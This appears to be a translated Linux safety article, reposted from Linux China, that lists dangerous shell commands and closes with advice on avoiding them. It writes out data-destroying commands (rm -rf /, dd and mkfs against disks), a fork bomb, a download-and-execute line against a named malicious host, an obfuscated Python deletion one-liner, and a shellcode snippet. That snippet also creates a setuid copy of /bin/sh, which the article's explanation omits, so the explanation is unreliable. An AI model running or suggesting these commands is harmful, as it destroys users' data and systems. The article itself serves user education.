(Click the public account above to quickly follow)
Source: Linux China
https://linux.cn/article-401-1.html
If you have good articles to submit, please click → here for details
The commands listed in this article should absolutely not be run, even if you are very curious, unless you are running them in a virtual machine (so you can restore it if something goes wrong), because they can genuinely damage your system. Therefore, it is a good habit not to execute commands with root or other high-level administrative privileges.
One day, Linux systems will become as popular as Windows, with more and more users, including those who are not very familiar with computers. The purpose of this article is to inform everyone: while Linux gives you maximum freedom, it also makes it easier to damage the system. If you do not understand the meaning of certain commands, download and execute scripts containing malicious commands, or are tricked into running certain commands, it can easily lead to regret.
This does not mean that Linux is unsafe; it simply indicates that in front of those who do not understand Linux and are very careless, Linux is quite unsafe. Whether it is Windows or Linux, the human factor is the greatest source of insecurity.
The following commands will delete files on your hard drive. The -r option of rm recursively deletes files, and the -f option forces deletion, which are very dangerous options. Even in daily operations, you may encounter situations where files are accidentally deleted.
sudo rm -rf / Deletes all files in the root partition
sudo rm -rf . Deletes all files in the current directory
sudo rm -rf * Same as above
rm -rf * or rm -rf *.* Same as above
rm -rf ~ / & Deletes both the root partition and home directory; even if you are not root, the home directory is still not spared.
Similarly, if you do not know that mkfs.xxxx (xxxx can be vfat, ext2, ext3, bfs…) is a formatting command, running the following command will erase your hard drive partition:
sudo mkfs.xxxx
dd is a powerful IO input/output redirection tool. If used improperly, it can cause significant damage, not just to the current partition or system, but sometimes to the entire hard drive.
sudo dd if=/dev/zero of=/dev/sda Clears the entire hard drive.
sudo dd if=/dev/sda of=/dev/sdb Overwrites the content of the second hard drive with the content of the first hard drive.
sudo dd if=something of=/dev/sda Writes garbage data to the hard drive.
Similarly, directly redirecting command results to the hard drive is equivalent to writing garbage data to the hard drive:
any_command > /dev/sda Destroys the hard drive with arbitrary data
The names sda, sdb, etc., may also be other similar names. Linux’s /dev system provides very convenient and powerful functions for manipulating hardware, but it also makes destruction easier.
The fork command opens a child process. If you place fork in an infinite loop, the child processes will eventually exhaust all memory resources:
:(){:|:&};:
This incomprehensible symbol can cause the shell to continuously fork child processes, ultimately leading to memory exhaustion and requiring a restart. This is not a bug; it is simply a shell statement written in a shorthand form. The following is similar:
fork while fork
Sometimes, compressed packages can also be a source of destruction~
Some compressed packages require you to extract them into a directory that already exists in the system, so you need to be particularly careful. The compressed package may contain thousands of small files attempting to overwrite your existing files with various filenames.
Some compressed packages may appear small, but extracting them can result in gigabytes of garbage data filling your hard drive.
Programs and scripts downloaded from unofficial websites can also contain malicious commands, so do not execute them casually:
wget [url]http://some_place/some_file[/url]
sh ./some_file
wget [url]http://hax018r.org/malicious-script[/url]
sh ./malicious-script
When downloading scripts, ensure the source is legitimate. If you have the ability, you can read the code. Even programs with source code should not be compiled and executed casually:
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″”xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″”xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″”x56x04xf7x56x08xf7x56x0cx83xc4x74x56″”x8dx73x08x56x53x54x59xb0x0bxcdx80x31″”xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″”x6ex2fx73x68x00x2dx63x00″”cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
What looks like a bunch of meaningless hexadecimal data, if someone tells you that running this program will allow you to gain root access without entering a password, do not believe them. The actual command executed by the above program is “rm -rf ~ / &”.
Python and similar scripting languages can also be used for destruction:
python -c ‘import os; os.system(“”.join([chr(ord(i)-1) for i in “sn!.sg! “]))’
This program will actually execute rm -rf *. You may be curious about what the ending “sn!.sg!” means; it is actually just the next letter of each character in rm -rf *!
So how can we avoid running malicious programs?
First, do not use root as your daily user. If the current user is not root, the scope of harm will be much smaller.
Second, know what each command does; do not run commands you do not understand. Be cautious when running programs with potential destructive capabilities and carefully check your inputs.
Third, ensure that the software and scripts come from legitimate sources.
Lastly, although it may seem negative, it is indeed a very important point: regularly back up your data!!
Did you gain something from reading this article? Please share it with more people.
Follow ‘Linux Enthusiasts’ to enhance your Linux skills